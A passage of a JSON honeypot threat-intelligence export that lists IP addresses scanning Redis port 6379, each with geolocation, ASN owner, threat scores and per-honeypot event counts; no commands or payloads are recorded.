      "attack_count": 15,
      "first_seen": "2026-03-06T22:55:08.000Z",
      "last_seen": "2026-03-13T17:11:29.205Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "The Netherlands",
      "country_code": "NL",
      "city": "Zaandam",
      "asn": 14956,
      "as_org": "RouterHosting LLC",
      "threat_score": 7.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 4.8,
        "persistence": 6.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.4
      },
      "reputation_metrics": {
        "total_events_30d": 3,
        "days_active_30d": 8,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-06T22:56:17.775000+00:00",
        "last_seen_30d": "2026-03-13T17:11:29.205000+00:00",
        "days_since_last_seen": 18
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3
      }
    },
    "135.237.126.37": {
      "attack_count": 15,
      "first_seen": "2026-03-10T13:59:21.000Z",
      "last_seen": "2026-03-10T14:02:30.518Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 73.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 14.9,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 31,
        "days_active_30d": 25,
        "ports_targeted_30d": 11,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-06T15:41:25.875000+00:00",
        "last_seen_30d": "2026-03-30T13:59:40.436000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 20,
        "Honeytrap": 6,
        "Redishoneypot": 3,
        "Dionaea": 2
      }
    },
    "20.38.45.150": {
      "attack_count": 15,
      "first_seen": "2026-03-28T06:06:00.000Z",
      "last_seen": "2026-03-28T06:08:52.681Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 52.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 12.0,
        "persistence": 17.5,
        "diversity": 12,
        "spread": 15,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 16,
        "days_active_30d": 21,
        "ports_targeted_30d": 6,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-09T13:58:44.125000+00:00",
        "last_seen_30d": "2026-03-29T12:26:21.103000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 10,
        "Honeytrap": 3,
        "Redishoneypot": 3
      }
    },
    "20.83.173.252": {
      "attack_count": 15,
      "first_seen": "2026-03-12T00:25:54.000Z",
      "last_seen": "2026-03-12T00:28:54.263Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 50.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.9,
        "persistence": 18.3,
        "diversity": 18,
        "spread": 15,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 31,
        "days_active_30d": 22,
        "ports_targeted_30d": 9,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-03T08:39:50.256000+00:00",
        "last_seen_30d": "2026-03-24T09:50:13.543000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 26,
        "Redishoneypot": 3,
        "Honeytrap": 2
      }
    },
    "20.84.41.22": {
      "attack_count": 15,
      "first_seen": "2026-03-31T14:17:10.000Z",
      "last_seen": "2026-03-31T14:19:28.312Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 38.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.5,
        "persistence": 7.5,
        "diversity": 6,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 9,
        "days_active_30d": 9,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-23T11:48:35.459000+00:00",
        "last_seen_30d": "2026-03-31T14:19:28.312000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 5,
        "Redishoneypot": 3,
        "Honeytrap": 1
      }
    },
    "40.124.116.246": {
      "attack_count": 15,
      "first_seen": "2026-03-08T17:33:23.000Z",
      "last_seen": "2026-03-08T17:35:22.717Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "San Antonio",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 48.1,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.6,
        "persistence": 19.2,
        "diversity": 14,
        "spread": 15,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 29,
        "days_active_30d": 23,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T19:05:50.911000+00:00",
        "last_seen_30d": "2026-03-24T06:44:49.327000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 17,
        "Honeytrap": 9,
        "Redishoneypot": 3
      }
    },
    "47.106.66.34": {
      "attack_count": 15,
      "first_seen": "2026-03-11T12:46:41.000Z",
      "last_seen": "2026-03-14T12:29:10.144Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shenzhen",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 9.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.0,
        "persistence": 3.3,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 4,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-11T12:46:41+00:00",
        "last_seen_30d": "2026-03-14T12:29:10.144000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 2
      }
    },
    "91.230.168.18": {
      "attack_count": 14,
      "first_seen": "2026-03-14T15:27:40.000Z",
      "last_seen": "2026-03-14T15:28:51.706Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 87.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 22.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 192,
        "days_active_30d": 30,
        "ports_targeted_30d": 60,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T04:42:56.499000+00:00",
        "last_seen_30d": "2026-03-31T21:49:18.881000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 140,
        "Honeytrap": 48,
        "Redishoneypot": 3,
        "Dionaea": 1
      }
    },
    "162.142.125.124": {
      "attack_count": 13,
      "first_seen": "2026-03-06T15:32:19.000Z",
      "last_seen": "2026-03-06T15:33:32.089Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 52.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 21.3,
        "persistence": 15.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 134,
        "days_active_30d": 19,
        "ports_targeted_30d": 31,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T17:33:44+00:00",
        "last_seen_30d": "2026-03-20T04:33:34.554000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Suricata": 88,
        "Honeytrap": 34,
        "Redishoneypot": 6,
        "CitrixHoneypot": 4,
        "Dionaea": 2
      }
    },
    "162.142.125.127": {
      "attack_count": 12,
      "first_seen": "2026-03-09T19:31:54.000Z",
      "last_seen": "2026-03-09T19:32:59.117Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 55.4,
      "threat_level": "medium",
      "score_components": {
        "frequency": 21.5,
        "persistence": 16.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 140,
        "days_active_30d": 20,
        "ports_targeted_30d": 39,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T16:28:59.130000+00:00",
        "last_seen_30d": "2026-03-21T15:16:50.968000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 75,
        "Honeytrap": 43,
        "Dionaea": 8,
        "Redishoneypot": 6,
        "Cowrie": 4,
        "ElasticPot": 4
      }
    },
    "167.94.138.113": {
      "attack_count": 12,
      "first_seen": "2026-03-18T04:32:27.000Z",
      "last_seen": "2026-03-18T04:33:39.045Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 63.0,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.6,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 181,
        "days_active_30d": 22,
        "ports_targeted_30d": 37,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T17:38:04.527000+00:00",
        "last_seen_30d": "2026-03-23T09:54:10.390000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 115,
        "Honeytrap": 49,
        "ElasticPot": 10,
        "Redishoneypot": 6,
        "Sentrypeer": 1
      }
    },
    "167.94.138.197": {
      "attack_count": 12,
      "first_seen": "2026-03-10T22:12:00.000Z",
      "last_seen": "2026-03-10T22:13:05.663Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 58.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 21.6,
        "persistence": 17.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 143,
        "days_active_30d": 21,
        "ports_targeted_30d": 36,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T02:28:32+00:00",
        "last_seen_30d": "2026-03-22T17:26:48.252000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 81,
        "Honeytrap": 39,
        "Ciscoasa": 6,
        "ConPot": 6,
        "Redishoneypot": 6,
        "ElasticPot": 4,
        "Dionaea": 1
      }
    },
    "185.242.226.6": {
      "attack_count": 12,
      "first_seen": "2026-03-06T16:48:33.000Z",
      "last_seen": "2026-03-07T19:25:16.214Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 19.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 26.0,
        "persistence": 8.3,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 398,
        "days_active_30d": 10,
        "ports_targeted_30d": 296,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:00:44.879000+00:00",
        "last_seen_30d": "2026-03-11T16:35:51.100000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 398
      }
    },
    "206.168.34.56": {
      "attack_count": 12,
      "first_seen": "2026-03-21T18:06:27.000Z",
      "last_seen": "2026-03-21T18:07:38.055Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 56.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 19.1,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 81,
        "days_active_30d": 22,
        "ports_targeted_30d": 27,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T05:59:50+00:00",
        "last_seen_30d": "2026-03-23T15:42:26.600000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 38,
        "Honeytrap": 36,
        "Redishoneypot": 6,
        "ConPot": 1
      }
    },
    "66.132.153.130": {
      "attack_count": 12,
      "first_seen": "2026-03-19T05:36:05.000Z",
      "last_seen": "2026-03-19T05:37:09.592Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 50.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 17.6,
        "persistence": 13.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 57,
        "days_active_30d": 16,
        "ports_targeted_30d": 20,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-06T18:51:30+00:00",
        "last_seen_30d": "2026-03-21T23:09:08.111000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 27,
        "Honeytrap": 17,
        "Cowrie": 6,
        "Redishoneypot": 6,
        "Dionaea": 1
      }
    },
    "66.132.172.35": {
      "attack_count": 12,
      "first_seen": "2026-03-25T08:34:51.000Z",
      "last_seen": "2026-03-25T08:36:02.965Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 69.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 19.2,
        "persistence": 10.0,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 84,
        "days_active_30d": 12,
        "ports_targeted_30d": 31,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-20T07:47:48.856000+00:00",
        "last_seen_30d": "2026-03-31T17:11:08.180000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 47,
        "Honeytrap": 30,
        "Redishoneypot": 6,
        "Ipphoney": 1
      }
    },
    "138.68.169.168": {
      "attack_count": 11,
      "first_seen": "2026-03-04T18:48:40.000Z",
      "last_seen": "2026-03-07T04:47:30.641Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": "Slough",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 2.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 3.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 4,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T18:49:48.363000+00:00",
        "last_seen_30d": "2026-03-07T04:47:30.641000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "172.105.186.117": {
      "attack_count": 11,
      "first_seen": "2026-03-09T16:37:21.645Z",
      "last_seen": "2026-03-30T04:59:18.067Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Australia",
      "country_code": "AU",
      "city": "Sydney",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 82.7,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.03
      },
      "reputation_metrics": {
        "total_events_30d": 4837171,
        "days_active_30d": 30,
        "ports_targeted_30d": 67322,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:00:00.018000+00:00",
        "last_seen_30d": "2026-03-31T23:52:01.441000+00:00",
        "days_since_last_seen": -1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4837171
      }
    },
    "185.242.226.4": {
      "attack_count": 11,
      "first_seen": "2026-03-05T00:16:59.000Z",
      "last_seen": "2026-03-12T21:42:20.593Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 62.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 29.5,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 897,
        "days_active_30d": 25,
        "ports_targeted_30d": 464,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:30:26.474000+00:00",
        "last_seen_30d": "2026-03-26T00:49:20.359000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 897
      }
    },
    "198.235.24.165": {
      "attack_count": 11,
      "first_seen": "2026-03-23T18:16:29.000Z",
      "last_seen": "2026-03-23T18:18:08.114Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 90.5,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.5,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 111,
        "days_active_30d": 30,
        "ports_targeted_30d": 28,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T23:08:21+00:00",
        "last_seen_30d": "2026-03-31T22:13:02.315000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 66,
        "Honeytrap": 21,
        "ConPot": 19,
        "Redishoneypot": 3,
        "Dionaea": 1,
        "Tanner": 1
      }
    },
    "123.245.85.127": {
      "attack_count": 10,
      "first_seen": "2026-03-09T20:19:15.000Z",
      "last_seen": "2026-03-09T20:20:18.886Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 5.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-09T20:19:16+00:00",
        "last_seen_30d": "2026-03-09T20:20:18.886000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 4,
        "Suricata": 1
      }
    },
    "147.185.132.105": {
      "attack_count": 10,
      "first_seen": "2026-03-18T19:34:20.000Z",
      "last_seen": "2026-03-18T19:35:53.564Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 86.1,
      "threat_level": "critical",
      "score_components": {
        "frequency": 19.9,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 97,
        "days_active_30d": 29,
        "ports_targeted_30d": 32,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T20:32:43+00:00",
        "last_seen_30d": "2026-03-30T18:53:42.084000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 64,
        "Honeytrap": 25,
        "ConPot": 4,
        "Redishoneypot": 3,
        "Tanner": 1
      }
    },
    "180.76.52.82": {
      "attack_count": 10,
      "first_seen": "2026-03-06T18:54:42.000Z",
      "last_seen": "2026-03-09T02:19:17.360Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 38365,
      "as_org": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
      "threat_score": 3.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 3.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 4,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-06T18:56:21.057000+00:00",
        "last_seen_30d": "2026-03-09T02:19:17.360000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "185.242.226.43": {
      "attack_count": 10,
      "first_seen": "2026-03-10T20:16:01.000Z",
      "last_seen": "2026-03-15T18:33:42.642Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 63.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 1049,
        "days_active_30d": 25,
        "ports_targeted_30d": 480,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:10:41.997000+00:00",
        "last_seen_30d": "2026-03-26T01:21:36.450000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1049
      }
    },
    "198.235.24.219": {
      "attack_count": 10,
      "first_seen": "2026-03-15T22:06:29.000Z",
      "last_seen": "2026-03-15T22:08:09.377Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 85.3,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.3,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 107,
        "days_active_30d": 30,
        "ports_targeted_30d": 33,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T00:58:16+00:00",
        "last_seen_30d": "2026-03-31T23:51:52+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 73,
        "Honeytrap": 30,
        "Redishoneypot": 3,
        "ConPot": 1
      }
    },
    "39.107.103.199": {
      "attack_count": 10,
      "first_seen": "2026-03-06T05:42:00.000Z",
      "last_seen": "2026-03-15T13:12:21.144Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 8.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 8.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 10,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-06T05:43:08.086000+00:00",
        "last_seen_30d": "2026-03-15T13:12:21.144000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "43.131.24.93": {
      "attack_count": 10,
      "first_seen": "2026-03-18T12:11:42.000Z",
      "last_seen": "2026-03-18T12:12:47.986Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": "Frankfurt am Main",
      "asn": 132203,
      "as_org": "Tencent Building, Kejizhongyi Avenue",
      "threat_score": 10.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-18T12:11:42+00:00",
        "last_seen_30d": "2026-03-18T12:12:47.986000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "66.132.153.155": {
      "attack_count": 10,
      "first_seen": "2026-03-11T12:26:05.000Z",
      "last_seen": "2026-03-15T13:40:17.257Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 36.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 17.2,
        "persistence": 15.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 52,
        "days_active_30d": 19,
        "ports_targeted_30d": 47,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T04:36:42.189000+00:00",
        "last_seen_30d": "2026-03-20T09:18:36.277000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Suricata": 52
      }
    },
    "78.47.232.216": {
      "attack_count": 10,
      "first_seen": "2026-03-27T20:12:27.000Z",
      "last_seen": "2026-03-29T00:27:29.305Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": "Falkenstein",
      "asn": 24940,
      "as_org": "Hetzner Online GmbH",
      "threat_score": 11.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 2.5,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 3,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-27T20:13:29.991000+00:00",
        "last_seen_30d": "2026-03-29T00:27:29.305000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "138.197.207.198": {
      "attack_count": 9,
      "first_seen": "2026-03-02T07:20:27.000Z",
      "last_seen": "2026-03-02T07:21:29.911Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Santa Clara",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 1.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T07:20:28+00:00",
        "last_seen_30d": "2026-03-02T07:21:29.911000+00:00",
        "days_since_last_seen": 29
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "185.180.141.2": {
      "attack_count": 9,
      "first_seen": "2026-03-29T07:52:02.000Z",
      "last_seen": "2026-03-29T07:53:06.908Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Portugal",
      "country_code": "PT",
      "city": null,
      "asn": 21859,
      "as_org": "Zenlayer Inc",
      "threat_score": 63.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 16.9,
        "persistence": 22.5,
        "diversity": 14,
        "spread": 15,
